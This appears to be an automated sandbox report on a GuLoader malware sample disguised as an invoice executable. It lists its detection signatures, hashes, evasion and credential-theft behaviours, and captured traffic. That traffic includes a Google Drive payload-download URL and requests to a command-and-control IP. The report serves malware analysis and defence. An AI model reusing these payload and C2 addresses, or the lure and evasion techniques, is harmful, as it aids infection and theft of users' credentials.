Windows Analysis Report usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe

Overview

General Information

Sample Name: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Analysis ID: 482656
MD5: 257e1f881863b023fcddaedb2ac22e68
SHA1: 9cff8e3a2a2cb5ad3acba8d4260b2581e0098ac9
SHA256: 856d455d07bff404e39b422f1ad0bbff9397707c86670dbc1134729b44a8c868
Tags: exe, guloader

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
Tries to detect virtualization through RDTSC time measurements
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000000.00000002.541230200.00000000022F0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=10smU8Pga"}
Multi AV Scanner detection for submitted file
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Virustotal: Detection: 28%
Machine Learning detection for sample
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.102.101:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.102.132:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.24.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.24.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.24.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.24.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.24.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.24.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.24.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.24.dr
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.24.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.24.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.24.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.24.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.24.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.24.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.24.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.24.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.24.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.24.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.24.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.24.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.24.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.24.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.24.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.24.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.24.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.24.dr
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=10smU8Pga
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /marinolumuop HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: telete.in
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Content-Length: 128 | Host: 94.158.245.117
Source: global traffic HTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/28e4ca709c3ae4e969310e3d8acd9cfc29159591 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 94.158.245.117
Source: global traffic HTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/fc0be222df12d21cfda3f20b85f1cab0e0a3d225 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 94.158.245.117
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV | Content-Length: 55359 | Host: 94.158.245.117
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.201.225.248
Source: Joe Sandbox View IP Address: 94.158.245.117
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Mon, 13 Sep 2021 23:07:19 GMT | Content-Type: application/octet-stream | Content-Length: 916735 | Connection: keep-alive | Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT | ETag: "612fa893-dfcff" | Accept-Ranges: bytes
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f4m8v3r8r5cuquncp7lqv8a7pcklg93e/1631574375000/14701716994733946506/*/10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4?e=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Cache-Control: no-cache | Host: doc-04-1s-docs.googleusercontent.com | Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Mon, 13 Sep 2021 23:07:24 GMT | Content-Type: application/octet-stream | Content-Length: 2828315 | Connection: keep-alive | Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT | ETag: "612fa893-2b281b" | Accept-Ranges: bytes
Source: unknown TCP traffic detected without corresponding DNS query: 94.158.245.117
Source: ldif60.dll.24.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ldif60.dll.24.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.24.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.24.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe String found in binary or memory: http://creativecommons.org/licenses/by-nc-sa/3.0/
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: ldif60.dll.24.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: ldif60.dll.24.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: ldif60.dll.24.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: ldif60.dll.24.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ldif60.dll.24.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.24.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://ocsp.accv.es0
Source: ldif60.dll.24.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: ldif60.dll.24.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: ldif60.dll.24.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.24.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.24.dr String found in binary or memory: http://repository.swisssign.com/0
Source: ldif60.dll.24.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: ldif60.dll.24.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: ldif60.dll.24.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.24.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: ldif60.dll.24.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.24.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.24.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: RYwTiizs2t.24.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RYwTiizs2t.24.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4wininet.dllMozilla/5
Source: RYwTiizs2t.24.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RYwTiizs2t.24.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RYwTiizs2t.24.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nssckbi.dll.24.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.24.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: RYwTiizs2t.24.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: RYwTiizs2t.24.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nssckbi.dll.24.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.24.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: ldif60.dll.24.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: RYwTiizs2t.24.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 94.158.245.117
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f4m8v3r8r5cuquncp7lqv8a7pcklg93e/1631574375000/14701716994733946506/*/10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-1s-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /marinolumuop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: telete.in
Source: global traffic HTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/28e4ca709c3ae4e969310e3d8acd9cfc29159591 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.158.245.117
Source: global traffic HTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/fc0be222df12d21cfda3f20b85f1cab0e0a3d225 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 94.158.245.117
Source: unknown HTTPS traffic detected: 142.250.102.101:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.102.132:443 -> 192.168.2.5:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.5:49790 version: TLS 1.2

System Summary:

Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Executable has a suspicious name (potential lure to open the executable)
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Static file information: Suspicious name
Uses 32bit PE files
Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7E91 0_2_022F7E91
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F6F7D 0_2_022F6F7D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA848 0_2_022FA848
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0941 0_2_022F0941
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F11C2 0_2_022F11C2
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FB9D0 0_2_022FB9D0
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5E24 0_2_022F5E24
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3A38 0_2_022F3A38
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBA02 0_2_022FBA02
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F161F 0_2_022F161F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F0E1E 0_2_022F0E1E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1A13 0_2_022F1A13
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5A6E 0_2_022F5A6E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBA7B 0_2_022FBA7B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5679 0_2_022F5679
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F3678 0_2_022F3678
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FAA4E 0_2_022FAA4E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F1258 0_2_022F1258
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F7650 0_2_022F7650
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F26B9 0_2_022F26B9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FBAB9 0_2_022FBAB9
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022FA2B5 0_2_022FA2B5
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5EB4 0_2_022F5EB4
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F628C 0_2_022F628C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F5EEB 0_2_022F5EEB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 0_2_022F2AE6 0_2_022F2AE6
